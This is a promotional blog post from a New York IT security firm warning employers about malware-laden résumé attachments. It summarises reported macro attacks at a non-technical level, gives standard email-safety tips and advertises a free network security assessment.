Résumé Attacks

Resume Attacks

Are you hiring?

Should you worry about clicking on an attachment of a job candidate because it might contain a virus or other type of malware (résumé attacks)?

Yes, you should.

First reported by Barracuda in a blog post about six weeks ago it appears criminals are expanding their efforts to use the growth of your company against you.  They send attractive résumés as bait for companies looking for great job candidates.

The threat is called an advanced persistent threat (“APT”). According to Wikipedia, it is “a set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity. An APT usually targets either private organizations, states or both for business or political motives.”

Examples – résumé attacks

In their blog post, Barracuda shared that one of their customers received five résumés that contained an Advanced Persistent Threat (APT) in late 2016. It only takes one APT to compromise your credibility, bring down your entire network, or even steal billions of dollars.

The scary thing is the files containing the malicious macro APT were .doc, typically trusted Microsoft Word files that are common for résumés.

Intronis reported one of their partners had a client’s HR manager opened a résumé that he believed to be from a prospective job seeker. The document opened up blank. Shortly thereafter, his computer was affected by a CryptoLocker variant that encrypted his hard drive contents. Fortunately, they were able to restore all documents and files from backup, but they had to complete a full system rebuild.

What Happens

The Barracuda example is quite fascinating, if you are not the victim. They explain it in simple terms below:

Upon detonating the file, the macro executed highly malicious activity.

The macro immediately:

  1. Downloaded and executed a visual basic script
  2. Imported external functions from the web and ran them
  3. Spawned a shell
  4. Connected to a remote server
  5. Actively began work to evade the computer’s built-in anti-virus


Each one of the attacks originated from a different email, and each one of them targeted a different employee. Two of the employees were administrative assistants, one was in accounting, and two others were in general administration.

This follows a pattern where hackers don’t necessarily need to infiltrate sensitive accounts, such as those belonging to senior executives in the company or someone in IT.

Instead, they seek to infiltrate the “weakest link” in the company in terms of security, and unsuspecting users typically fit that bill perfectly. After they infect an account or an endpoint, they typically proceed to infiltrate the rest of the organization from within, quietly before anyone ever realizes.

Typical modes

These are two typical modes of operation:

  1. After infecting one of the accounts (e.g., with a résumé attack), they will then send a new threat to a different account using the email of the original employee infected.
  2. They infect an account and track who in the company oversees wire transfers, invoices, and so forth. Then they will use that information to launch a targeted spear phishing attack.


The emails were written casually with a friendly manner, and were designed to impersonate a colleague asking another colleague about their opinion about a résumé. Seems innocent enough, yes?

In all cases, the email was opened by the employee because they mistakenly thought it was a legitimate résumée that was sent to them.

This threat underscores the importance of always following best practices when dealing with email.

For example:

  • Do not click on any links in email. Type the address directly into your browser.
  • Do not open suspicious attachments, even if they seem to be from someone you trust.
  • Keep endpoint antivirus, patches, and other software updated.
  • Do not reveal sensitive personal or company information in email.
  • If you aren’t sure of whether an email is legitimate, verify by contacting the company or person directly on the phone, or through legitimate communications you have previously received from that company. (Not email.)


What to Do Now

In an ideal world your network and individual computer systems would be protected from any virus or malware.

However, if you haven’t noticed, we do not live in a perfect world.

WCA offers the most comprehensive security protection available, however there are thousands of new viruses created daily. Therefore your organization needs the best security, but also your people have to be trained how to avoid clicking where they should not.

Is your company secure? Find out at no cost and without interrupting your much of your day. For a limited time you can schedule a no cost, no obligation network security assessment from WCA today.

It is better to assess your security BEFORE there is a break-in.

Your WCA assessment might confirm your network is just fine.

Good News

WCA does the work so the assessment does not interrupt your schedule. WCA Clients receive these assessments regularly.

At WCA, we help corporations, nonprofit organizations, and government entities assess their I.T. vulnerabilities and productivity daily.

WCA Technologies is a reputable, 28-year-old Manhattan team of computer experts providing IT security and managed services. We have protected New York City businesses and nonprofits from cyber hackers for decades.

Who ever thought résumés would be threat? Do not assume. Confirm your company is safe.

Remove technology productivity gaps.  Confirm your backup and other systems are working properly. Tighten security. Train your staff. Improve your security policies. Know your digital assets are secure BEFORE you have to explain a security breach to your boss, board of directors, and/or shareholders.

Contact WCA online or call (212) 642-0980 to schedule a conversation with Peter Fidler, one of our founders. He will help you get your complimentary network security assessment scheduled quickly.